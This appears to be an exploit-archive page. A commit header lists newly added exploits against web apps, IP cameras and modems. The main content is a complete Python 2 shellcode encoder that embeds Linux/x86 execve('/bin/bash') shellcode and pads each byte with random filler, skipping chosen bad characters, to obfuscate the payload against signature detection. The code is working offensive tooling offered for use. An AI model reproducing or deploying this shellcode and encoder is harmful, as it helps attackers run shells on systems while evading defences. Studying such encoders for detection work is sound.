d667cf901c
11 changes to exploits/shellcodes Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC) River Past Audio Converter 7.7.16 - Denial of Service (PoC) ResourceSpace 8.6 - 'watched_searches.php' SQL Injection SuiteCRM 7.10.7 - 'parentTab' SQL Injection SuiteCRM 7.10.7 - 'record' SQL Injection ResourceSpace 8.6 - 'watched_searches.php' SQL Injection SuiteCRM 7.10.7 - 'parentTab' SQL Injection SuiteCRM 7.10.7 - 'record' SQL Injection BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin) BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure devolo dLAN 550 duo+ Starter Kit - Cross-Site Request Forgery devolo dLAN 550 duo+ Starter Kit - Remote Code Execution Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery OpenMRS Platform < 2.24.0 - Insecure Object Deserialization Linux/x86 - Random Insertion Encoder and Decoder Shellcode (Generator)
83 lines
No EOL
2 KiB
Python
Executable file
83 lines
No EOL
2 KiB
Python
Executable file
#!/usr/bin/python
|
|
# Python Random Insertion Encoder
|
|
# Author: Aditya Chaudhary
|
|
# Date: 5th Feb 2019
|
|
|
|
|
|
import random
|
|
import sys
|
|
import argparse
|
|
|
|
shellcode = ("\x31\xc0\x50\x89\xe2\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")
|
|
|
|
# Parse Arguments
|
|
parser = argparse.ArgumentParser()
|
|
parser.add_argument("-e", "--entropy", help="Entropy of random byted to be inserted after each shellcode byte (use a value between 1 & 10)", type=int)
|
|
parser.add_argument("-b", "--badchars", help="Badchars to removed from inserted bytes", type=str)
|
|
args = parser.parse_args()
|
|
|
|
|
|
encoded = ""
|
|
encoded2 = ""
|
|
|
|
|
|
entropy = args.entropy
|
|
bad_chars = args.badchars
|
|
#print len(sys.argv)
|
|
#if len(sys.argv) > 1:
|
|
# entropy = int(sys.argv[1])
|
|
|
|
print '[#] Using Entropy: %s (inserting 1 to %s random number of bytes)'%(entropy, entropy)
|
|
|
|
#if len(sys.argv) < 3:
|
|
# print '[#] No Bad characters provided'
|
|
#else:
|
|
# bad_chars = str(sys.argv[2])
|
|
bad_chars = bad_chars.split(',')
|
|
print '[#] Bad chars: %s'%(bad_chars)
|
|
|
|
# Generate byte string from \x01 to \xff
|
|
chars = []
|
|
for o in range(256):
|
|
#print(hex(o))
|
|
ch = '%02x' % o
|
|
if ch not in bad_chars:
|
|
chars.append(ch)
|
|
|
|
|
|
print '[#] Generating Shellcode...'
|
|
|
|
repeat = 0
|
|
|
|
for x in bytearray(shellcode) :
|
|
repeat = random.randint(1, entropy)
|
|
#print "[#]"+str(repeat)
|
|
encoded += '\\x'
|
|
encoded += '%02x' % x
|
|
encoded += '\\x'
|
|
encoded += '%02x'% repeat
|
|
|
|
encoded2 += '0x'
|
|
encoded2 += '%02x,' % x
|
|
encoded2 += '0x'
|
|
encoded2 += '%02x,' % repeat
|
|
|
|
en_byte = ""
|
|
for i in range(1, repeat+1):
|
|
# print i
|
|
en_byte = chars[random.randint(0, len(chars)-1)]
|
|
|
|
encoded += '\\x%s' % en_byte
|
|
# encoded += '\\x%02x' % random.randint(1,255)
|
|
encoded2 += '0x%s,' % en_byte
|
|
# encoded2 += '0x%02x,' % random.randint(1,255)
|
|
#encoded += '\n'
|
|
|
|
|
|
print '[#] Encoded shellcode:'
|
|
|
|
print encoded
|
|
print encoded2
|
|
|
|
print '[#] Shellcode Length: %d' % len(bytearray(shellcode))
|
|
print '[#] Encoded Shellcode Length: %d' % encoded.count('x') |